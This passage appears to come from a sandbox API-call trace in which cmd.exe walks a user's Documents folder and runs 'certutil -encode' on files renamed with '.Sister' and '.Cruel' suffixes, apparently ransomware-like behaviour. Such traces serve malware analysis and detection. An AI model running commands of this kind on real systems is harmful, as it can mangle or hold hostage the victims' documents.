_MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0308.001] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0308.001] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0308.001] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0308.001] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0308.001] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0308.001] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0308.001] GetProcessHeap () returned 0x21ed8c70000 [0308.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d40) returned 1 [0308.001] GetProcessHeap () returned 0x21ed8c70000 [0308.001] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c958e0 [0308.001] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0308.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.002] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0308.002] _get_osfhandle (_FileHandle=0) returned 0x4c [0308.002] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0308.003] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Documents", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xfcc, dwThreadId=0x368)) returned 1 [0308.018] CloseHandle (hObject=0xa8) returned 1 [0308.018] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0308.018] GetProcessHeap () returned 0x21ed8c70000 [0308.018] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0308.018] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0308.018] GetProcessHeap () returned 0x21ed8c70000 [0308.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed9980080 [0308.019] FreeEnvironmentStringsA (penv="=") returned 1 [0308.020] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0308.520] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0308.520] CloseHandle (hObject=0xa4) returned 1 [0308.520] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0308.520] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0308.520] GetProcessHeap () returned 0x21ed8c70000 [0308.520] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0308.521] GetEnvironmentStringsW () returned 0x21ed9980080* [0308.521] GetProcessHeap () returned 0x21ed8c70000 [0308.521] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d603e0 [0308.521] FreeEnvironmentStringsA (penv="=") returned 1 [0308.521] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0308.521] GetProcessHeap () returned 0x21ed8c70000 [0308.521] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0308.521] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0308.521] GetProcessHeap () returned 0x21ed8c70000 [0308.521] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed9980080 [0308.521] FreeEnvironmentStringsA (penv="=") returned 1 [0308.521] GetProcessHeap () returned 0x21ed8c70000 [0308.521] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c958e0) returned 1 [0308.522] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0308.522] ??_V@YAXPEAX@Z () returned 0x1 [0308.522] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Database1.accdb.Sister", cAlternateFileName="")) returned 1 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2ee80, Size=0x100) returned 0x21ed8c7d1f0 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d1f0) returned 0x100 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93801d0 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93801d0, Size=0x58) returned 0x21ed93801d0 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93801d0) returned 0x58 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9380240 [0308.522] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0308.522] GetProcessHeap () returned 0x21ed8c70000 [0308.522] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7c110 [0308.522] ??_V@YAXPEAX@Z () returned 0x1 [0308.522] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0308.523] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0308.523] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0308.523] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cca0 [0308.523] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0308.523] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe2768fcf, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe2768fcf, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cfa0 [0308.524] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0308.524] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0308.524] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Database1.accdb.Sister", cAlternateFileName="DATABA~1.SIS")) returned 0x21ed8c7cee0 [0308.524] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0308.524] _wcsnicmp (_String1="DATABA~1.SIS", _String2="Database1.accdb.Sister", _MaxCount=0x16) returned 11 [0308.524] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0308.524] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0308.524] GetProcessHeap () returned 0x21ed8c70000 [0308.524] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8990 [0308.524] ??_V@YAXPEAX@Z () returned 0x1 [0308.524] ??_V@YAXPEAX@Z () returned 0x1 [0308.524] GetProcessHeap () returned 0x21ed8c70000 [0308.524] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9380240, Size=0x1e0) returned 0x21ed9380240 [0308.525] GetProcessHeap () returned 0x21ed8c70000 [0308.525] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9380240) returned 0x1e0 [0308.525] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0308.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.525] GetFileType (hFile=0x50) returned 0x2 [0308.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.525] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0308.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.525] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0308.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0308.531] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0308.531] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0308.532] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0308.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.532] GetFileType (hFile=0x50) returned 0x2 [0308.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.534] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0308.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.534] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0308.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.535] GetFileType (hFile=0x50) returned 0x2 [0308.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.535] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0308.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.535] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93801e0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93801e0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0308.536] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"Database1.accdb.Sister\" \"Database1.accdb.Cruel\" ") returned 58 [0308.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.536] GetFileType (hFile=0x50) returned 0x2 [0308.536] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.537] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0308.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.537] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3a) returned 1 [0308.538] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0308.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.538] GetFileType (hFile=0x50) returned 0x2 [0308.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.538] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0308.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0308.538] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0308.543] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0308.544] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0308.544] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0308.544] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0308.544] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0308.544] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0308.544] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0308.544] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0308.544] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0308.544] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0308.544] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0308.544] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0308.544] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0308.544] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0308.544] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0308.544] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0308.544] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0308.544] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0308.546] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0308.546] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0308.546] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0308.546] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0308.546] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0308.546] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0308.546] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0308.546] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0308.546] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0308.546] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0308.547] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0308.547] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0308.547] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0308.547] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0308.547] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0308.547] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0308.547] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0308.547] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0308.547] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0308.547] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0308.547] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0308.547] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0308.547] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0308.547] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0308.547] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0308.547] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0308.547] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0308.547] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0308.547] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0308.547] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0308.547] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0308.547] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0308.547] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0308.547] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0308.547] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0308.547] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0308.548] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0308.548] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0308.548] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0308.548] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0308.548] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0308.548] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0308.548] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0308.548] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0308.548] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0308.548] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0308.548] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0308.548] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0308.548] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0308.548] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0308.548] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0308.548] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0308.548] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0308.548] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0308.548] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0308.548] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0308.548] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0308.548] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0308.548] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0308.548] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0308.548] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0308.548] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0308.548] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0308.548] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0308.549] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0308.549] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0308.549] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0308.549] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0308.549] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0308.549] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0308.549] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0308.549] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0308.549] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0308.549] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0308.549] ??_V@YAXPEAX@Z () returned 0x1 [0308.549] GetProcessHeap () returned 0x21ed8c70000 [0308.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9380430 [0308.549] GetProcessHeap () returned 0x21ed8c70000 [0308.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x96) returned 0x21ed8d63a40 [0308.550] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0308.550] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0308.550] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0308.550] GetProcessHeap () returned 0x21ed8c70000 [0308.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9390420 [0308.551] SetErrorMode (uMode=0x0) returned 0x0 [0308.676] SetErrorMode (uMode=0x1) returned 0x0 [0308.676] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9390430, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0xa6cf4fdb80*="Documents") returned 0x19 [0308.676] SetErrorMode (uMode=0x0) returned 0x1 [0308.677] GetProcessHeap () returned 0x21ed8c70000 [0308.677] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9390420, Size=0x56) returned 0x21ed9390420 [0308.677] GetProcessHeap () returned 0x21ed8c70000 [0308.677] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9390420) returned 0x56 [0308.677] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0308.677] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0308.677] GetProcessHeap () returned 0x21ed8c70000 [0308.677] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c0) returned 0x21ed8d65170 [0308.677] GetProcessHeap () returned 0x21ed8c70000 [0308.677] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x370) returned 0x21ed8d562b0 [0308.677] GetProcessHeap () returned 0x21ed8c70000 [0308.678] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d562b0, Size=0x1c2) returned 0x21ed8d64690 [0308.678] GetProcessHeap () returned 0x21ed8c70000 [0308.678] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64690) returned 0x1c2 [0308.678] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0308.678] GetProcessHeap () returned 0x21ed8c70000 [0308.678] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c72720 [0308.678] GetProcessHeap () returned 0x21ed8c70000 [0308.678] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72720, Size=0x7e) returned 0x21ed8c72720 [0308.678] GetProcessHeap () returned 0x21ed8c70000 [0308.678] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72720) returned 0x7e [0308.678] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0308.678] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0308.679] GetLastError () returned 0x2 [0308.679] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0308.679] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0308.679] GetLastError () returned 0x2 [0308.679] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0308.679] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd60 [0308.680] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0308.680] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | 